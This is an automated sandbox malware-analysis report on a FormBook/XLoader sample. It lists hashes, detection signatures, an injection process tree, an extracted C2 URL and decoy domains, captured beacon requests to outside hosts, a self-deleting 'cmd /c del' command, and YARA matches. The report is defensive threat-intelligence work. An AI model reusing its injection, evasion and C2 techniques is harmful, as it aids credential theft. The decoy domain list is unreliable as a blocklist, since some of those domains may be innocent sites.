Windows Analysis Report 583475.exe

Overview

General Information

Sample Name: 583475.exe
Analysis ID: 510246
MD5: 721356bfa1f8c23d40f6b2ff77b55db0
SHA1: c4d25b17c64716f2e7558bd302cd901bd63757d8
SHA256: e876c1db90717ff0819f4fc578adace61decdad64963836ebc9ae983dc87a5d6
Tags: exe, xloader

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large array initializations
Tries to detect virtualization through RDTSC time measurements
Sigma detected: CMSTP Execution Process Creation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • 583475.exe (PID: 5816 cmdline: 'C:\Users\user\Desktop\583475.exe' MD5: 721356BFA1F8C23D40F6B2FF77B55DB0)
    • AddInProcess32.exe (PID: 5540 cmdline: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • autofmt.exe (PID: 4720 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)
      • cmstp.exe (PID: 7120 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
        • cmd.exe (PID: 5216 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.eeeptou.xyz/uat8/"], "decoy": ["suddennnnnnnnnnnn47.xyz", "fggj99.com", "ojosnegroshacienda.com", "tinyhollywood.com", "marketersmeetup.com", "anushreehomemadeproducts.online", "appsdeals14.com", "ocean-breath-retreat.com", "subin-party.com", "offroad.wiki", "coryfairbanks.com", "algurgpaint.net", "k1snks.com", "florakitchens.com", "tollywoodbold.com", "kzkidz.com", "bequestporfze.xyz", "tiplovellc.com", "city-ad.com", "strombolidefilm.com", "789trangchu.xyz", "transfer-news.pro", "wtv864.com", "seospiders.xyz", "bargaingreat.com", "clarysvillemotel.online", "fbiicrc.com", "pf-hi.com", "perverseonline.com", "hugevari.com", "dilekcaglar.online", "authorakkingsley.com", "cloudlessinc.com", "newjourneypro.com", "vacuumcoolingsouthamerica.com", "oursalesguide.com", "shopsoulandstone.com", "circularsmartcity.com", "segwayw.com", "tackle.tools", "tech-franchisee.com", "ff4c2m3vc.xyz", "nlug.net", "artofadhd.zone", "xfqmwk.xyz", "ossname.xyz", "copost.net", "kokosiborsel.quest", "abbastanza.info", "eyehealthtnpasumo4.xyz", "mashburnblog.com", "looped.agency", "atlasgsllc.com", "nimbleiter.com", "nzaz2.xyz", "varundeshpande.com", "foodbevtech.com", "cassandrajasmine.net", "taxunite.com", "hannahhirsh.com", "stonebay.pizza", "xh-kd.com", "tealdazzleshop.com", "wkpnmqfb.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
00000000.00000002.745714719.0000000003CBD000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000000.00000002.745714719.0000000003CBD000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      7.0.AddInProcess32.exe.400000.8.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      7.0.AddInProcess32.exe.400000.8.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      7.0.AddInProcess32.exe.400000.8.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
      7.2.AddInProcess32.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      7.2.AddInProcess32.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

          Sigma Overview

          System Summary:

          Sigma detected: CMSTP Execution Process Creation
          Source: Process started, Author: Nik Seetharaman: Data: Command: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe', CommandLine: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cmstp.exe, ParentImage: C:\Windows\SysWOW64\cmstp.exe, ParentProcessId: 7120, ProcessCommandLine: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe', ProcessId: 5216

          Jbx Signature Overview

          AV Detection:

          Found malware configuration
          Source: 00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmp, Malware Configuration Extractor: FormBook
          Yara detected FormBook
          Machine Learning detection for sample
          Source: 583475.exe, Joe Sandbox ML: detected
          Source: 7.0.AddInProcess32.exe.400000.6.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.0.AddInProcess32.exe.400000.8.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.AddInProcess32.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.0.AddInProcess32.exe.400000.4.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 583475.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: unknown, HTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.4:49757 version: TLS 1.0
          Source: 583475.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: cmstp.pdbGCTL source: AddInProcess32.exe, 00000007.00000002.830902849.00000000017C0000.00000040.00020000.sdmp
          Source: Binary string: AddInProcess32.pdb source: 583475.exe, 00000000.00000003.729306073.0000000006746000.00000004.00000001.sdmp, AddInProcess32.exe, cmstp.exe, 00000011.00000002.920345538.0000000000CEC000.00000004.00000020.sdmp, AddInProcess32.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, cmstp.exe, 00000011.00000002.921765476.0000000004F2F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: AddInProcess32.exe, cmstp.exe
          Source: Binary string: cmstp.pdb source: AddInProcess32.exe, 00000007.00000002.830902849.00000000017C0000.00000040.00020000.sdmp
          Source: Binary string: AddInProcess32.pdbpw source: 583475.exe, 00000000.00000003.729306073.0000000006746000.00000004.00000001.sdmp, AddInProcess32.exe, 00000007.00000000.731556294.0000000000892000.00000002.00020000.sdmp, cmstp.exe, 00000011.00000002.920345538.0000000000CEC000.00000004.00000020.sdmp, AddInProcess32.exe.0.dr

          Networking:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe, Domain query: www.appsdeals14.com
          Source: C:\Windows\explorer.exe, Domain query: www.tinyhollywood.com
          Source: C:\Windows\explorer.exe, Network Connect: 68.66.224.28 80
          Source: C:\Windows\explorer.exe, Network Connect: 34.102.136.180 80
          Performs DNS queries to domains with low reputation
          Source: DNS query: www.eeeptou.xyz
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor, URLs: www.eeeptou.xyz/uat8/
          Source: Joe Sandbox View, ASN Name: A2HOSTINGUS A2HOSTINGUS
          Source: Joe Sandbox View, JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | Host: www.google.com | Connection: Keep-Alive
          Source: global traffic, HTTP traffic detected: GET /uat8/?7n=GRDJ3ughmVrqUFdKRM8Q0h4JrA2wYJd2LMNbPLjm/ZbIfdCCVia0cPEPKDDb+4lh8gF7&_2Jp=lPpXAD HTTP/1.1 | Host: www.tinyhollywood.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /uat8/?7n=6Y3MMElcCL8ncUt/K0lRUija0CRc99ofqSlJjt4IDKVpKgRu3E5zG/kW1DnZY4iUvzuw&_2Jp=lPpXAD HTTP/1.1 | Host: www.appsdeals14.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: unknown, HTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.4:49757 version: TLS 1.0
          Source: unknown, Network traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49757
          Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Wed, 27 Oct 2021 14:30:57 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "61774856-113" | Via: 1.1 google | Connection: close | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 27 Oct 2021 14:31:02 GMT | Server: Apache | Strict-Transport-Security: max-age=63072000; includeSubDomains | X-Frame-Options: SAMEORIGIN | X-Content-Type-Options: nosniff | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: 583475.exe, 00000000.00000002.747848189.0000000006D7F000.00000004.00000001.sdmp, String found in binary or memory: http://ns.ado/1
          Source: 583475.exe, 00000000.00000003.659153791.0000000006D81000.00000004.00000001.sdmp, String found in binary or memory: http://ns.ado/1E
          Source: 583475.exe, 00000000.00000002.747848189.0000000006D7F000.00000004.00000001.sdmp, String found in binary or memory: http://ns.adobe.c/g
          Source: 583475.exe, 00000000.00000003.659153791.0000000006D81000.00000004.00000001.sdmp, String found in binary or memory: http://ns.adobe.c/gE
          Source: 583475.exe, 00000000.00000002.747848189.0000000006D7F000.00000004.00000001.sdmp, String found in binary or memory: http://ns.adobe.cobj
          Source: 583475.exe, 00000000.00000003.659153791.0000000006D81000.00000004.00000001.sdmp, String found in binary or memory: http://ns.adobe.cobjE
          Source: 583475.exe, 00000000.00000003.658913034.0000000006D81000.00000004.00000001.sdmp, String found in binary or memory: http://ns.d
          Source: 583475.exe, 00000000.00000002.741286003.0000000002C41000.00000004.00000001.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: 583475.exe, 00000000.00000002.741286003.0000000002C41000.00000004.00000001.sdmp, String found in binary or memory: https://www.google.com
          Source: 583475.exe, 00000000.00000002.741286003.0000000002C41000.00000004.00000001.sdmp, String found in binary or memory: https://www.google.com/
          Source: unknown, DNS traffic detected: queries for: www.google.com

          E-Banking Fraud:

          Yara detected FormBook

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.734058524.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.734058524.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.829890254.0000000000D40000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.829890254.0000000000D40000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.768614516.000000000DA38000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.768614516.000000000DA38000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          .NET source code contains very large array initializations
          Source: 583475.exe, m1DY/f0L8.cs, Large array initialization: .cctor: array initializer size 4946
          Source: 583475.exe, Zp0/e6J.cs, Large array initialization: .cctor: array initializer size 2762
          Source: 583475.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Both rules matched each of the following sources:
          Source: 7.0.AddInProcess32.exe.400000.8.unpack, type: UNPACKEDPE
          Source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: 7.0.AddInProcess32.exe.400000.6.unpack, type: UNPACKEDPE
          Source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: 7.0.AddInProcess32.exe.400000.4.unpack, type: UNPACKEDPE
          Source: 7.0.AddInProcess32.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: 7.0.AddInProcess32.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: 00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmp, type: MEMORY
          Source: 00000000.00000002.745714719.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY
          Source: 00000000.00000002.746396498.0000000003DF5000.00000004.00000001.sdmp, type: MEMORY
          Source: 00000009.00000000.786309842.000000000DA38000.00000040.00020000.sdmp, type: MEMORY
          Source: 00000011.00000002.921089072.0000000002E90000.00000040.00020000.sdmp, type: MEMORY
          Source: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: 00000000.00000002.745995404.0000000003D29000.00000004.00000001.sdmp, type: MEMORY
          Source: 00000007.00000002.830002490.0000000000D90000.00000040.00020000.sdmp, type: MEMORY
          Source: 00000007.00000000.733674390.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, type: MEMORY
          Source: 00000007.00000000.734058524.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: 00000007.00000002.829890254.0000000000D40000.00000040.00020000.sdmp, type: MEMORY
          Source: 00000009.00000000.768614516.000000000DA38000.00000040.00020000.sdmp, type: MEMORY
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: String function: 0131B150 appears 35 times
          Source: C:\Windows\SysWOW64\cmstp.exe, Code function: String function: 04E3B150 appears 32 times
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_004185D0 NtCreateFile
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_00418680 NtReadFile
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_00418700 NtClose
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_004187B0 NtAllocateVirtualMemory
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_004185CA NtCreateFile
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_0041867A NtReadFile
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_004186FA NtReadFile, NtClose
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_01359910 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_01359540 NtReadFile, LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_013599A0 NtCreateSection, LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_013595D0 NtClose, LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_01359860 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_01359840 NtDelayExecution, LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_013598F0 NtReadVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_01359710 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_013597A0 NtUnmapViewOfSection, LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_01359780 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_01359FE0 NtCreateMutant, LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_01359A20 NtResumeThread, LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_01359A00 NtProtectVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_01359660 NtAllocateVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_01359A50 NtCreateFile, LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_013596E0 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_0135AD30 NtSetContextThread
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_01359520 NtWaitForSingleObject
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_01359560 NtWriteFile
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_01359950 NtQueueApcThread
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_013595F0 NtQueryInformationFile
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_013599D0 NtCreateProcessEx
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_01359820 NtEnumerateKey
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_0135B040 NtSuspendThread
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_013598A0 NtWriteVirtualMemory
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_01359730 NtQueryVirtualMemory
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_0135A710 NtOpenProcessToken
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_01359B00 NtSetValueKey
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_01359770 NtSetInformationFile
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_0135A770 NtOpenThread
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_01359760 NtOpenProcess
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_0135A3B0 NtGetContextThread
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_01359610 NtEnumerateValueKey
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_01359A10 NtQuerySection
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_01359670 NtQueryInformationProcess
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_01359650 NtQueryValueKey
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_01359A80 NtOpenDirectoryObject
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 7_2_013596D0 NtCreateKey
          Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 17_2_04E79860 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 17_2_04E79840 NtDelayExecution, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 17_2_04E795D0 NtClose, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 17_2_04E799A0 NtCreateSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 17_2_04E79540 NtReadFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 17_2_04E79910 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 17_2_04E796E0 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 17_2_04E796D0 NtCreateKey, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 17_2_04E79660 NtAllocateVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 17_2_04E79A50 NtCreateFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 17_2_04E79650 NtQueryValueKey, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 17_2_04E79FE0 NtCreateMutant, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 17_2_04E79780 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 17_2_04E79710 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 17_2_04E798F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 17_2_04E798A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 17_2_04E7B040 NtSuspendThread
          Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 17_2_04E79820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 17_2_04E795F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 17_2_04E799D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 17_2_04E79560 NtWriteFile
          Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 17_2_04E79950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 17_2_04E79520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 17_2_04E7AD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79A80 NtOpenDirectoryObject,17_2_04E79A80
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79670 NtQueryInformationProcess,17_2_04E79670
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79A20 NtResumeThread,17_2_04E79A20
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79A00 NtProtectVirtualMemory,17_2_04E79A00
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79610 NtEnumerateValueKey,17_2_04E79610
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79A10 NtQuerySection,17_2_04E79A10
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E797A0 NtUnmapViewOfSection,17_2_04E797A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E7A3B0 NtGetContextThread,17_2_04E7A3B0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79760 NtOpenProcess,17_2_04E79760
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79770 NtSetInformationFile,17_2_04E79770
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E7A770 NtOpenThread,17_2_04E7A770
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79730 NtQueryVirtualMemory,17_2_04E79730
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79B00 NtSetValueKey,17_2_04E79B00
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E7A710 NtOpenProcessToken,17_2_04E7A710
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FA8680 NtReadFile,17_2_02FA8680
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FA87B0 NtAllocateVirtualMemory,17_2_02FA87B0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FA8700 NtClose,17_2_02FA8700
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FA85D0 NtCreateFile,17_2_02FA85D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FA86FA NtReadFile,NtClose,17_2_02FA86FA
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FA867A NtReadFile,17_2_02FA867A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FA85CA NtCreateFile,17_2_02FA85CA
          Source: 583475.exe, 00000000.00000002.741383689.0000000002CF3000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPe6.dll" vs 583475.exe
          Source: 583475.exe, 00000000.00000002.740499326.000000000094C000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDemoProject2.exe: vs 583475.exe
          Source: 583475.exe, 00000000.00000002.747381692.0000000006850000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameSHCore1.dll0 vs 583475.exe
          Source: 583475.exe, 00000000.00000003.729306073.0000000006746000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAddInProcess32.exeT vs 583475.exe
          Source: 583475.exeBinary or memory string: OriginalFilenameDemoProject2.exe: vs 583475.exe
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe 23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
          Source: 583475.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\583475.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\583475.exe 'C:\Users\user\Desktop\583475.exe'
          Source: C:\Users\user\Desktop\583475.exeProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
